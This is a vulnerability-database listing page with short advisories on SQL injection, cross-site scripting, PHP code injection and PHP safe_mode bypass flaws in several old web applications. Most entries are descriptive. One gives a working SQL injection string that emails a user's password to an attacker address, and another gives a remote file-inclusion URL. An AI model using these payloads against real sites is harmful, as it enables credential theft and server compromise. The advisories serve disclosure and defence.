header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

PluggedOut Nexus SQL-Injection Vulnerability

PluggedOut Nexus is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. The following proof of concept exploit is available: Insert this code in E-Mail Address form (http://www.example.com/Nexus/forgotten_password.php) : hamidnetworksecurityteam' union select cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from nexus_users WHERE nUserId=1 and '1'='1 This will email the password for userID=1 to ATTACKER@EMAIL.ADDRESS.

Dawaween SQL-injection Vulnerability

Dawaween is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Successful exploits could allow a remote attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

SMBlog Arbitrary Command Execution Vulnerability

SMBlog is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP commands on the vulnerable computer in the context of the webserver process.

PEHEPE Membership Management System Remote PHP Code-Injection Vulnerability

PEHEPE Membership Management System is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible. An example of the vulnerable code is http://www.example.com/sol_menu.php?uye_klasor=http://www.example.org&misafir[]=UYE_SEVIYE

PEHEPE Membership Management System Cross-Site Scripting Vulnerability

PEHEPE Membership Management System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

EJ3 TOPo Cross-Site Scripting Vulnerability

EJ3 TOPo is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

PHP Multiple Input Validation Vulnerabilities

PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. An attacker can exploit these issues to bypass security restrictions and execute arbitrary code with the privileges of the user running the affected application.

PHP Multiple Input-Validation Vulnerabilities

PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. An attacker can exploit these issues to bypass security settings and gain access to unauthorized resources.

Multiple Input-Validation Vulnerabilities in n8cms

The 'n8cms' script is prone to multiple input-validation vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. Successful exploitation could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

QwikiWiki Cross-Site Scripting Vulnerability

QwikiWiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

Recent Exploits: